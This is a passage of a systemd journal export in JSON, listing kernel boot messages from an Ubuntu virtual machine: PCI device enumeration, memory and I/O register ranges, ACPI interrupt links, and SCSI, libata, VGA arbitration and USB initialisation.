"kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "287935", "MESSAGE" : "pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fa;b=e2b08827b5804427b422c10c84f1567e;m=55d5fe;t=5bd16dd195566;x=7a2bf3739926c36d", "__REALTIME_TIMESTAMP" : "1615280779908454", "__MONOTONIC_TIMESTAMP" : "5625342", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "288006", "MESSAGE" : "pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fb;b=e2b08827b5804427b422c10c84f1567e;m=55d683;t=5bd16dd1955ea;x=3ea7c3e0f893caac", "__REALTIME_TIMESTAMP" : "1615280779908586", "__MONOTONIC_TIMESTAMP" : "5625475", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "291842", "MESSAGE" : "pci 0000:00:01.2: [8086:7020] type 00 class 0x0c0300" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fc;b=e2b08827b5804427b422c10c84f1567e;m=55d6fc;t=5bd16dd195664;x=cc7b8675d98e90b5", "__REALTIME_TIMESTAMP" : "1615280779908708", "__MONOTONIC_TIMESTAMP" : "5625596", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "294288", "MESSAGE" : "pci 0000:00:01.2: reg 0x20: [io 0xc080-0xc09f]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fd;b=e2b08827b5804427b422c10c84f1567e;m=55d775;t=5bd16dd1956dd;x=bb7c0f76dca68866", "__REALTIME_TIMESTAMP" : "1615280779908829", "__MONOTONIC_TIMESTAMP" : "5625717", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.3", "_UDEV_SYSNAME" : "0000:00:01.3", "_SOURCE_MONOTONIC_TIMESTAMP" : "295835", "MESSAGE" : "pci 0000:00:01.3: [8086:7113] type 00 class 0x068000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fe;b=e2b08827b5804427b422c10c84f1567e;m=55d831;t=5bd16dd195799;x=4a4b68dabe7c021a", "__REALTIME_TIMESTAMP" : "1615280779909017", "__MONOTONIC_TIMESTAMP" : "5625905", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.3", "_UDEV_SYSNAME" : "0000:00:01.3", "_SOURCE_MONOTONIC_TIMESTAMP" : "296549", "MESSAGE" : "pci 0000:00:01.3: quirk: [io 0x0600-0x063f] claimed by PIIX4 ACPI" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ff;b=e2b08827b5804427b422c10c84f1567e;m=55d8b5;t=5bd16dd19581d;x=4f9eb59d248eeca9", "__REALTIME_TIMESTAMP" : "1615280779909149", "__MONOTONIC_TIMESTAMP" : "5626037", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.3", "_UDEV_SYSNAME" : "0000:00:01.3", "_SOURCE_MONOTONIC_TIMESTAMP" : "300020", "MESSAGE" : "pci 0000:00:01.3: quirk: [io 0x0700-0x070f] claimed by PIIX4 SMB" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=100;b=e2b08827b5804427b422c10c84f1567e;m=55f34b;t=5bd16dd1972b2;x=9672743b62d46b09", "__REALTIME_TIMESTAMP" : "1615280779915954", "__MONOTONIC_TIMESTAMP" : "5632843", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "304343", "MESSAGE" : "pci 0000:00:02.0: [1013:00b8] type 00 class 0x030000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=101;b=e2b08827b5804427b422c10c84f1567e;m=55f3d4;t=5bd16dd19733b;x=dad091db668fefa1", "__REALTIME_TIMESTAMP" : "1615280779916091", "__MONOTONIC_TIMESTAMP" : "5632980", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "306361", "MESSAGE" : "pci 0000:00:02.0: reg 0x10: [mem 0xfc000000-0xfdffffff pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=102;b=e2b08827b5804427b422c10c84f1567e;m=55f460;t=5bd16dd1973c7;x=b848ec1593b0e0b2", "__REALTIME_TIMESTAMP" : "1615280779916231", "__MONOTONIC_TIMESTAMP" : "5633120", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "307479", "MESSAGE" : "pci 0000:00:02.0: reg 0x14: [mem 0xfeb90000-0xfeb90fff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=103;b=e2b08827b5804427b422c10c84f1567e;m=55f4d9;t=5bd16dd197440;x=cd2a284651410bdd", "__REALTIME_TIMESTAMP" : "1615280779916352", "__MONOTONIC_TIMESTAMP" : "5633241", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "315528", "MESSAGE" : "pci 0000:00:02.0: reg 0x30: [mem 0xfeb80000-0xfeb8ffff pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=104;b=e2b08827b5804427b422c10c84f1567e;m=55ff5b;t=5bd16dd197ec3;x=d559f12bdc4d3a18", "__REALTIME_TIMESTAMP" : "1615280779919043", "__MONOTONIC_TIMESTAMP" : "5635931", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "316278", "MESSAGE" : "pci 0000:00:03.0: [1af4:1000] type 00 class 0x020000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=105;b=e2b08827b5804427b422c10c84f1567e;m=560065;t=5bd16dd197fcd;x=c1318bc350a41dce", "__REALTIME_TIMESTAMP" : "1615280779919309", "__MONOTONIC_TIMESTAMP" : "5636197", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "318019", "MESSAGE" : "pci 0000:00:03.0: reg 0x10: [io 0xc000-0xc03f]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=106;b=e2b08827b5804427b422c10c84f1567e;m=560c8d;t=5bd16dd198bf5;x=3790925f3d37d293", "__REALTIME_TIMESTAMP" : "1615280779922421", "__MONOTONIC_TIMESTAMP" : "5639309", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "319363", "MESSAGE" : "pci 0000:00:03.0: reg 0x14: [mem 0xfeb91000-0xfeb91fff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=107;b=e2b08827b5804427b422c10c84f1567e;m=561022;t=5bd16dd198f8a;x=9a96e7085dc5526d", "__REALTIME_TIMESTAMP" : "1615280779923338", "__MONOTONIC_TIMESTAMP" : "5640226", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "324685", "MESSAGE" : "pci 0000:00:03.0: reg 0x20: [mem 0xfe000000-0xfe003fff 64bit pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=108;b=e2b08827b5804427b422c10c84f1567e;m=5610ab;t=5bd16dd199012;x=258d5893ee7cb072", "__REALTIME_TIMESTAMP" : "1615280779923474", "__MONOTONIC_TIMESTAMP" : "5640363", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "325809", "MESSAGE" : "pci 0000:00:03.0: reg 0x30: [mem 0xfeb00000-0xfeb7ffff pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=109;b=e2b08827b5804427b422c10c84f1567e;m=56145b;t=5bd16dd1993c3;x=a445db786e25b7ff", "__REALTIME_TIMESTAMP" : "1615280779924419", "__MONOTONIC_TIMESTAMP" : "5641307", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:04.0", "_UDEV_SYSNAME" : "0000:00:04.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "326787", "MESSAGE" : "pci 0000:00:04.0: [1af4:1001] type 00 class 0x010000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10a;b=e2b08827b5804427b422c10c84f1567e;m=5614e0;t=5bd16dd199447;x=953a051cf3c0a2f0", "__REALTIME_TIMESTAMP" : "1615280779924551", "__MONOTONIC_TIMESTAMP" : "5641440", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:04.0", "_UDEV_SYSNAME" : "0000:00:04.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "328007", "MESSAGE" : "pci 0000:00:04.0: reg 0x10: [io 0xc040-0xc07f]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10b;b=e2b08827b5804427b422c10c84f1567e;m=56155a;t=5bd16dd1994c1;x=eca6999d82627363", "__REALTIME_TIMESTAMP" : "1615280779924673", "__MONOTONIC_TIMESTAMP" : "5641562", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:04.0", "_UDEV_SYSNAME" : "0000:00:04.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "329720", "MESSAGE" : "pci 0000:00:04.0: reg 0x14: [mem 0xfeb92000-0xfeb92fff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10c;b=e2b08827b5804427b422c10c84f1567e;m=5615d1;t=5bd16dd199538;x=b23315038c74e053", "__REALTIME_TIMESTAMP" : "1615280779924792", "__MONOTONIC_TIMESTAMP" : "5641681", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:04.0", "_UDEV_SYSNAME" : "0000:00:04.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "335597", "MESSAGE" : "pci 0000:00:04.0: reg 0x20: [mem 0xfe004000-0xfe007fff 64bit pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10d;b=e2b08827b5804427b422c10c84f1567e;m=567973;t=5bd16dd19f8da;x=8ff045f9f3e8fc82", "__REALTIME_TIMESTAMP" : "1615280779950298", "__MONOTONIC_TIMESTAMP" : "5667187", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:05.0", "_UDEV_SYSNAME" : "0000:00:05.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "337790", "MESSAGE" : "pci 0000:00:05.0: [1af4:1002] type 00 class 0x00ff00" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10e;b=e2b08827b5804427b422c10c84f1567e;m=567a66;t=5bd16dd19f9cd;x=7d0a2d1aec5849bc", "__REALTIME_TIMESTAMP" : "1615280779950541", "__MONOTONIC_TIMESTAMP" : "5667430", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:05.0", "_UDEV_SYSNAME" : "0000:00:05.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "338824", "MESSAGE" : "pci 0000:00:05.0: reg 0x10: [io 0xc0a0-0xc0bf]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10f;b=e2b08827b5804427b422c10c84f1567e;m=567afa;t=5bd16dd19fa62;x=616e0cb21b26318b", "__REALTIME_TIMESTAMP" : "1615280779950690", "__MONOTONIC_TIMESTAMP" : "5667578", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:05.0", "_UDEV_SYSNAME" : "0000:00:05.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "341694", "MESSAGE" : "pci 0000:00:05.0: reg 0x20: [mem 0xfe008000-0xfe00bfff 64bit pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=110;b=e2b08827b5804427b422c10c84f1567e;m=567b1c;t=5bd16dd19fa83;x=a407ca8354182a3b", "__REALTIME_TIMESTAMP" : "1615280779950723", "__MONOTONIC_TIMESTAMP" : "5667612", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "344087", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKA] (IRQs 5 *10 11)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=111;b=e2b08827b5804427b422c10c84f1567e;m=567b39;t=5bd16dd19faa0;x=5a080d416374655", "__REALTIME_TIMESTAMP" : "1615280779950752", "__MONOTONIC_TIMESTAMP" : "5667641", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "348221", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=112;b=e2b08827b5804427b422c10c84f1567e;m=567b56;t=5bd16dd19fabe;x=f56c6933e8a41b64", "__REALTIME_TIMESTAMP" : "1615280779950782", "__MONOTONIC_TIMESTAMP" : "5667670", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "351450", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=113;b=e2b08827b5804427b422c10c84f1567e;m=567b61;t=5bd16dd19fac8;x=769b2591422f969", "__REALTIME_TIMESTAMP" : "1615280779950792", "__MONOTONIC_TIMESTAMP" : "5667681", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "352146", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKD] (IRQs 5 10 *11)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=114;b=e2b08827b5804427b422c10c84f1567e;m=567b6c;t=5bd16dd19fad3;x=195d7febbfa8445e", "__REALTIME_TIMESTAMP" : "1615280779950803", "__MONOTONIC_TIMESTAMP" : "5667692", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "355786", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKS] (IRQs *9)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=115;b=e2b08827b5804427b422c10c84f1567e;m=567b76;t=5bd16dd19fadd;x=b6df4498793218fa", "__REALTIME_TIMESTAMP" : "1615280779950813", "__MONOTONIC_TIMESTAMP" : "5667702", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "356645", "MESSAGE" : "SCSI subsystem initialized" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=116;b=e2b08827b5804427b422c10c84f1567e;m=567b81;t=5bd16dd19fae9;x=8d55216e4c7e3dcd", "__REALTIME_TIMESTAMP" : "1615280779950825", "__MONOTONIC_TIMESTAMP" : "5667713", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "358701", "MESSAGE" : "libata version 3.00 loaded." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=117;b=e2b08827b5804427b422c10c84f1567e;m=567c19;t=5bd16dd19fb80;x=c2175f8ff043c5a4", "__REALTIME_TIMESTAMP" : "1615280779950976", "__MONOTONIC_TIMESTAMP" : "5667865", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "358802", "MESSAGE" : "pci 0000:00:02.0: vgaarb: setting as boot VGA device" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=118;b=e2b08827b5804427b422c10c84f1567e;m=567c9d;t=5bd16dd19fc04;x=7a84bcfa070c7460", "__REALTIME_TIMESTAMP" : "1615280779951108", "__MONOTONIC_TIMESTAMP" : "5667997", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "360000", "MESSAGE" : "pci 0000:00:02.0: vgaarb: VGA device added: decodes=io+mem,owns=io+mem,locks=none" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=119;b=e2b08827b5804427b422c10c84f1567e;m=567d39;t=5bd16dd19fca0;x=8ee36903463241db", "__REALTIME_TIMESTAMP" : "1615280779951264", "__MONOTONIC_TIMESTAMP" : "5668153", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "360008", "MESSAGE" : "pci 0000:00:02.0: vgaarb: bridge control possible" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11a;b=e2b08827b5804427b422c10c84f1567e;m=569d98;t=5bd16dd1a1d00;x=3a17ec29797ff8da", "__REALTIME_TIMESTAMP" : "1615280779959552", "__MONOTONIC_TIMESTAMP" : "5676440", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "363066", "MESSAGE" : "vgaarb: loaded" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11b;b=e2b08827b5804427b422c10c84f1567e;m=569dac;t=5bd16dd1a1d14;x=1b30f904cb43f9ba", "__REALTIME_TIMESTAMP" : "1615280779959572", "__MONOTONIC_TIMESTAMP" : "5676460", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "364055", "MESSAGE" : "ACPI: bus type USB registered" } { "__CURSOR" : 